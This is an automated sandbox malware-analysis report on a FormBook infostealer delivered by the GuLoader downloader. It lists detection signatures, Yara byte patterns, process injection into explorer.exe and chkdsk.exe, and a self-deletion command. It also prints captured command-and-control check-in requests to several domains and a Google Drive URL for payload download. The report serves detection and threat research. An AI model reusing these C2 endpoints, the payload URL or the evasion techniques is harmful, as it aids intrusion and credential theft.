Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report UAE CONTRACT SUPPLY.exe

Overview

General Information

Sample Name:UAE CONTRACT SUPPLY.exe
Analysis ID:358403
MD5:9da74a6d583c801677c0e2fde51586ba
SHA1:e1af77b99ca69e4737fa4d73a77e5702d5c13e91
SHA256:9d295dd246f6844b1bfe945cdf914a1615d0dacd9aa9f40d1276bc75f796268c
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • UAE CONTRACT SUPPLY.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: 9DA74A6D583C801677C0E2FDE51586BA)
    • UAE CONTRACT SUPPLY.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: 9DA74A6D583C801677C0E2FDE51586BA)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • chkdsk.exe (PID: 392 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5048 cmdline: /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x5434:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 19 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: UAE CONTRACT SUPPLY.exeVirustotal: Detection: 33%Perma Link
      Source: UAE CONTRACT SUPPLY.exeReversingLabs: Detection: 36%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY
      Source: 16.2.chkdsk.exe.5bc7960.5.unpackAvira: Label: TR/Dropper.Gen
      Source: 16.2.chkdsk.exe.fd4f08.1.unpackAvira: Label: TR/Dropper.Gen

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: UAE CONTRACT SUPPLY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Uses secure TLS version for HTTPS connectionsShow sources
      Source: unknownHTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49731 version: TLS 1.2
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: chkdsk.pdbGCTL source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: UAE CONTRACT SUPPLY.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop esi
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.aserchofalltrades.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.parentseducationalco-op.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.allsalesvinyl.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1Host: www.pardsoda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1Host: www.sixteen3handscottages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
      Source: Joe Sandbox ViewASN Name: WIX_COMIL WIX_COMIL
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.aserchofalltrades.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.parentseducationalco-op.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.allsalesvinyl.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1Host: www.pardsoda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1Host: www.sixteen3handscottages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: doc-08-78-docs.googleusercontent.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Feb 2021 14:28:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-wix-request-id: 1614263295.2061857739024538739vary: Accept-EncodingAge: 0X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgAmI6NXu6WfqLI/M7f8tcV,2d58ifebGbosy5xc+FRaljJhPW/QGfx+q8yY6tJt4liplW2KIFCnP2WuDwYfqFs95giHFpZ7ywPurTQjYl2cGQ==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,m0j2EEknGIVUW/liY8BLLsk16xozuw6nSXf6CEzK6Aca0sM5c8dDUFHeNaFq0qDu,JLaio/7uvfP647F5CQsGZbrBoTckX0poWZhq63wruFRGp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZZDXl7I7ILTyJojtezEQxYM0d1JjSaSBjnO+SH73qBkvWIHlCalF7YnfvOr2cMPpyw==Server: Pepyaka/1.15.10Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 Data Ascii: b93 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollo
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: UAE CONTRACT SUPPLY.exeString found in binary or memory: https://drive.google.com/uc?export=download&id=1tH9Kn1AiB6JALzFxr9xEwyDe2gfOw8eq
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownHTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49731 version: TLS 1.2

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266266 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226054E EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262592 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02265DCB NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266629 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02260636 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226263A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02263606 NtSetInformationThread,LoadLibraryA,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226626E NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226066A NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262644 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226065C NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022606A9 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02260682 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02260690 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226629C NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262698 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022606EA NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022662EA NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022626FD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022662C5 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022652C8 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266335 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262764 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022663A0 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022663AA NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022663F8 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022627DA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226283B NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226641E NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02265040 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266455 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022664A4 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022628BC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022664FB NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266566 NtResumeThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262942 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022629BD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022625E5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022605D4 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022605D0 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5096E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509FE0 NtCreateMutant,LdrInitializeThunk,
